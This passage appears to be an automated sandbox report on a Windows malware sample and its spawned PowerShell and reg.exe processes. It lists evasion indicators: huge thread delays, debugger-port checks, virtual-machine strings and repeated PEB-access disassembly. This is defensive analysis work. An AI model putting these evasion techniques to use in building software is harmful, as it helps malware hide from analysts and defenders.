            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3464Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3421Jump to behavior
            Source: C:\Windows\SysWOW64\reg.exeWindow / User API: threadDelayed 3051
            Source: C:\Windows\SysWOW64\reg.exeWindow / User API: threadDelayed 6921
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeAPI coverage: 0.7 %
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeAPI coverage: 0.4 %
            Source: C:\Windows\SysWOW64\reg.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe TID: 7288Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep count: 3464 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe TID: 7932Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\reg.exe TID: 2484Thread sleep count: 3051 > 30
            Source: C:\Windows\SysWOW64\reg.exe TID: 2484Thread sleep time: -6102000s >= -30000s
            Source: C:\Windows\SysWOW64\reg.exe TID: 2484Thread sleep count: 6921 > 30
            Source: C:\Windows\SysWOW64\reg.exe TID: 2484Thread sleep time: -13842000s >= -30000s
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe TID: 7528Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe TID: 7528Thread sleep count: 32 > 30
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe TID: 7528Thread sleep time: -48000s >= -30000s
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe TID: 7528Thread sleep count: 33 > 30
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe TID: 7528Thread sleep time: -33000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\reg.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\reg.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CEC070 FindFirstFileW,FindNextFileW,FindClose,17_2_02CEC070
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: AZJifQrhDpEQCA.exe, 00000009.00000002.1775330764.0000000000C25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:P
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1697199208.0000000000C30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: toUuGVMciQ
            Source: reg.exe, 00000011.00000002.4128479477.000000000308E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*)
            Source: DAGiwzvTYsMjq.exe, 00000017.00000002.4129225895.00000000011EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
            Source: firefox.exe, 00000018.00000002.2152960492.000002D6E504C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\reg.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E096E rdtsc 8_2_017E096E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00417BD3 LdrLoadDll,8_2_00417BD3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01844180 mov eax, dword ptr fs:[00000030h]8_2_01844180
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01844180 mov eax, dword ptr fs:[00000030h]8_2_01844180
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185C188 mov eax, dword ptr fs:[00000030h]8_2_0185C188
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185C188 mov eax, dword ptr fs:[00000030h]8_2_0185C188
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182019F mov eax, dword ptr fs:[00000030h]8_2_0182019F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182019F mov eax, dword ptr fs:[00000030h]8_2_0182019F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182019F mov eax, dword ptr fs:[00000030h]8_2_0182019F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182019F mov eax, dword ptr fs:[00000030h]8_2_0182019F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A6154 mov eax, dword ptr fs:[00000030h]8_2_017A6154
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A6154 mov eax, dword ptr fs:[00000030h]8_2_017A6154
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179C156 mov eax, dword ptr fs:[00000030h]8_2_0179C156
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018661C3 mov eax, dword ptr fs:[00000030h]8_2_018661C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018661C3 mov eax, dword ptr fs:[00000030h]8_2_018661C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181E1D0 mov eax, dword ptr fs:[00000030h]8_2_0181E1D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181E1D0 mov eax, dword ptr fs:[00000030h]8_2_0181E1D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181E1D0 mov ecx, dword ptr fs:[00000030h]8_2_0181E1D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181E1D0 mov eax, dword ptr fs:[00000030h]8_2_0181E1D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181E1D0 mov eax, dword ptr fs:[00000030h]8_2_0181E1D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D0124 mov eax, dword ptr fs:[00000030h]8_2_017D0124
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018761E5 mov eax, dword ptr fs:[00000030h]8_2_018761E5
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D01F8 mov eax, dword ptr fs:[00000030h]8_2_017D01F8
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184E10E mov eax, dword ptr fs:[00000030h]8_2_0184E10E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184E10E mov ecx, dword ptr fs:[00000030h]8_2_0184E10E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184E10E mov eax, dword ptr fs:[00000030h]8_2_0184E10E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184E10E mov eax, dword ptr fs:[00000030h]8_2_0184E10E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184E10E mov ecx, dword ptr fs:[00000030h]8_2_0184E10E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184E10E mov eax, dword ptr fs:[00000030h]8_2_0184E10E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184E10E mov eax, dword ptr fs:[00000030h]8_2_0184E10E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184E10E mov ecx, dword ptr fs:[00000030h]8_2_0184E10E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184E10E mov eax, dword ptr fs:[00000030h]8_2_0184E10E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184E10E mov ecx, dword ptr fs:[00000030h]8_2_0184E10E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01860115 mov eax, dword ptr fs:[00000030h]8_2_01860115
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184A118 mov ecx, dword ptr fs:[00000030h]8_2_0184A118
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184A118 mov eax, dword ptr fs:[00000030h]8_2_0184A118
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184A118 mov eax, dword ptr fs:[00000030h]8_2_0184A118
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184A118 mov eax, dword ptr fs:[00000030h]8_2_0184A118
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01834144 mov eax, dword ptr fs:[00000030h]8_2_01834144
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01834144 mov eax, dword ptr fs:[00000030h]8_2_01834144
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01834144 mov ecx, dword ptr fs:[00000030h]8_2_01834144
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01834144 mov eax, dword ptr fs:[00000030h]8_2_01834144
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01834144 mov eax, dword ptr fs:[00000030h]8_2_01834144
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01838158 mov eax, dword ptr fs:[00000030h]8_2_01838158
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874164 mov eax, dword ptr fs:[00000030h]8_2_01874164
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874164 mov eax, dword ptr fs:[00000030h]8_2_01874164
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179A197 mov eax, dword ptr fs:[00000030h]8_2_0179A197
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179A197 mov eax, dword ptr fs:[00000030h]8_2_0179A197
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179A197 mov eax, dword ptr fs:[00000030h]8_2_0179A197
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E0185 mov eax, dword ptr fs:[00000030h]8_2_017E0185
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CC073 mov eax, dword ptr fs:[00000030h]8_2_017CC073
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A2050 mov eax, dword ptr fs:[00000030h]8_2_017A2050
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018380A8 mov eax, dword ptr fs:[00000030h]8_2_018380A8
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018660B8 mov eax, dword ptr fs:[00000030h]8_2_018660B8
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018660B8 mov ecx, dword ptr fs:[00000030h]8_2_018660B8
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179A020 mov eax, dword ptr fs:[00000030h]8_2_0179A020
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179C020 mov eax, dword ptr fs:[00000030h]8_2_0179C020
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018220DE mov eax, dword ptr fs:[00000030h]8_2_018220DE
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018260E0 mov eax, dword ptr fs:[00000030h]8_2_018260E0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BE016 mov eax, dword ptr fs:[00000030h]8_2_017BE016
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BE016 mov eax, dword ptr fs:[00000030h]8_2_017BE016
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BE016 mov eax, dword ptr fs:[00000030h]8_2_017BE016
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BE016 mov eax, dword ptr fs:[00000030h]8_2_017BE016
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01824000 mov ecx, dword ptr fs:[00000030h]8_2_01824000
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01842000 mov eax, dword ptr fs:[00000030h]8_2_01842000
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01842000 mov eax, dword ptr fs:[00000030h]8_2_01842000
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01842000 mov eax, dword ptr fs:[00000030h]8_2_01842000
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01842000 mov eax, dword ptr fs:[00000030h]8_2_01842000
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01842000 mov eax, dword ptr fs:[00000030h]8_2_01842000
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01842000 mov eax, dword ptr fs:[00000030h]8_2_01842000
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01842000 mov eax, dword ptr fs:[00000030h]8_2_01842000
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01842000 mov eax, dword ptr fs:[00000030h]8_2_01842000
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179C0F0 mov eax, dword ptr fs:[00000030h]8_2_0179C0F0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E20F0 mov ecx, dword ptr fs:[00000030h]8_2_017E20F0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A80E9 mov eax, dword ptr fs:[00000030h]8_2_017A80E9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179A0E3 mov ecx, dword ptr fs:[00000030h]8_2_0179A0E3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01836030 mov eax, dword ptr fs:[00000030h]8_2_01836030
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01826050 mov eax, dword ptr fs:[00000030h]8_2_01826050
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017980A0 mov eax, dword ptr fs:[00000030h]8_2_017980A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A208A mov eax, dword ptr fs:[00000030h]8_2_017A208A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018263C0 mov eax, dword ptr fs:[00000030h]8_2_018263C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185C3CD mov eax, dword ptr fs:[00000030h]8_2_0185C3CD
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018443D4 mov eax, dword ptr fs:[00000030h]8_2_018443D4
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018443D4 mov eax, dword ptr fs:[00000030h]8_2_018443D4
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184E3DB mov eax, dword ptr fs:[00000030h]8_2_0184E3DB
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184E3DB mov eax, dword ptr fs:[00000030h]8_2_0184E3DB
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184E3DB mov ecx, dword ptr fs:[00000030h]8_2_0184E3DB
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184E3DB mov eax, dword ptr fs:[00000030h]8_2_0184E3DB
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179C310 mov ecx, dword ptr fs:[00000030h]8_2_0179C310
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C0310 mov ecx, dword ptr fs:[00000030h]8_2_017C0310
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DA30B mov eax, dword ptr fs:[00000030h]8_2_017DA30B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DA30B mov eax, dword ptr fs:[00000030h]8_2_017DA30B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DA30B mov eax, dword ptr fs:[00000030h]8_2_017DA30B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D63FF mov eax, dword ptr fs:[00000030h]8_2_017D63FF
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BE3F0 mov eax, dword ptr fs:[00000030h]8_2_017BE3F0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BE3F0 mov eax, dword ptr fs:[00000030h]8_2_017BE3F0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BE3F0 mov eax, dword ptr fs:[00000030h]8_2_017BE3F0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B03E9 mov eax, dword ptr fs:[00000030h]8_2_017B03E9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B03E9 mov eax, dword ptr fs:[00000030h]8_2_017B03E9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B03E9 mov eax, dword ptr fs:[00000030h]8_2_017B03E9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B03E9 mov eax, dword ptr fs:[00000030h]8_2_017B03E9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B03E9 mov eax, dword ptr fs:[00000030h]8_2_017B03E9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B03E9 mov eax, dword ptr fs:[00000030h]8_2_017B03E9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B03E9 mov eax, dword ptr fs:[00000030h]8_2_017B03E9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B03E9 mov eax, dword ptr fs:[00000030h]8_2_017B03E9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01878324 mov eax, dword ptr fs:[00000030h]8_2_01878324
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01878324 mov ecx, dword ptr fs:[00000030h]8_2_01878324
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01878324 mov eax, dword ptr fs:[00000030h]8_2_01878324
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01878324 mov eax, dword ptr fs:[00000030h]8_2_01878324
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA3C0 mov eax, dword ptr fs:[00000030h]8_2_017AA3C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA3C0 mov eax, dword ptr fs:[00000030h]8_2_017AA3C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA3C0 mov eax, dword ptr fs:[00000030h]8_2_017AA3C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA3C0 mov eax, dword ptr fs:[00000030h]8_2_017AA3C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA3C0 mov eax, dword ptr fs:[00000030h]8_2_017AA3C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA3C0 mov eax, dword ptr fs:[00000030h]8_2_017AA3C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A83C0 mov eax, dword ptr fs:[00000030h]8_2_017A83C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A83C0 mov eax, dword ptr fs:[00000030h]8_2_017A83C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A83C0 mov eax, dword ptr fs:[00000030h]8_2_017A83C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A83C0 mov eax, dword ptr fs:[00000030h]8_2_017A83C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0187634F mov eax, dword ptr fs:[00000030h]8_2_0187634F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01822349 mov eax, dword ptr fs:[00000030h]8_2_01822349
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186A352 mov eax, dword ptr fs:[00000030h]8_2_0186A352
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01848350 mov ecx, dword ptr fs:[00000030h]8_2_01848350
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182035C mov eax, dword ptr fs:[00000030h]8_2_0182035C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182035C mov eax, dword ptr fs:[00000030h]8_2_0182035C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182035C mov eax, dword ptr fs:[00000030h]8_2_0182035C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182035C mov ecx, dword ptr fs:[00000030h]8_2_0182035C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182035C mov eax, dword ptr fs:[00000030h]8_2_0182035C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182035C mov eax, dword ptr fs:[00000030h]8_2_0182035C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01798397 mov eax, dword ptr fs:[00000030h]8_2_01798397
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01798397 mov eax, dword ptr fs:[00000030h]8_2_01798397
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01798397 mov eax, dword ptr fs:[00000030h]8_2_01798397
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179E388 mov eax, dword ptr fs:[00000030h]8_2_0179E388
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179E388 mov eax, dword ptr fs:[00000030h]8_2_0179E388
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179E388 mov eax, dword ptr fs:[00000030h]8_2_0179E388
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C438F mov eax, dword ptr fs:[00000030h]8_2_017C438F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C438F mov eax, dword ptr fs:[00000030h]8_2_017C438F
